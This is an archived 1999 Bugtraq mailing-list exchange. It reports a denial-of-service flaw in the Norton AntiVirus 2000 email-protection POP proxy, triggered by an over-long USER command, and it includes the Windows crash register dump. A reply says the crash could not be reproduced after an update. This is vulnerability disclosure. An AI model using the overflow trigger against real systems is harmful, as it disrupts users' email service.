Fw: NAV2000 Email Protection DoS

[bohemian () OPTONLINE NET (Bohemian)]

I couldn't recreate this on my machine which is running Norton 2000.  It's
running a pop server on port 110 but any invalid input, like the one
suggested below, causes immediate disconnection from the host. I just D/Led
a software update for it, so maybe it was fixed.

MrBohemian
MCP

----- Original Message -----
From: <kyle () RAGEOUT ORG>
To: <BUGTRAQ () SECURITYFOCUS COM>
Sent: Friday, December 17, 1999 11:34 AM
Subject: NAV2000 Email Protection DoS

> Hello, I just found somewhat of a problem in Symantec's Email protection
> in NAV2000.
>
> The Protection program leaves a pop server running on the local
> workstation NAV2000 is installed on.. This server can be crashed somewhat
> like this
> telnet 1.1.1.1
> USER (over 1200 char)
>
> Then, GPF in windows98
> POPROXY caused an invalid page fault in
> module <unknown> at 0000:31393837.
> Registers:
> EAX=02bcfcbc CS=017f EIP=31393837 EFLGS=00010246
> EBX=02bcfcbc SS=0187 ESP=02ad001c EBP=02ad003c
> ECX=02ad00c0 DS=0187 ESI=817538c0 FS=4fbf
> EDX=bff76855 ES=0187 EDI=02ad00e8 GS=0000
> Bytes at CS:EIP:
>
> Stack dump:
> bff76849 02ad00e8 02bcfcbc 02ad0104 02ad00c0 02ad01f4 bff76855 02bcfcbc
> 02ad00d0 bff87fe9 02ad00e8 02bcfcbc 02ad0104 02ad00c0 31393837 02ad02ac
>
> In the time after the crash user must reboot to regain email function on
> Workstation
>
>
> This as been tested on 3 Machines Win98 SE Win95 rev B and Win95 rev C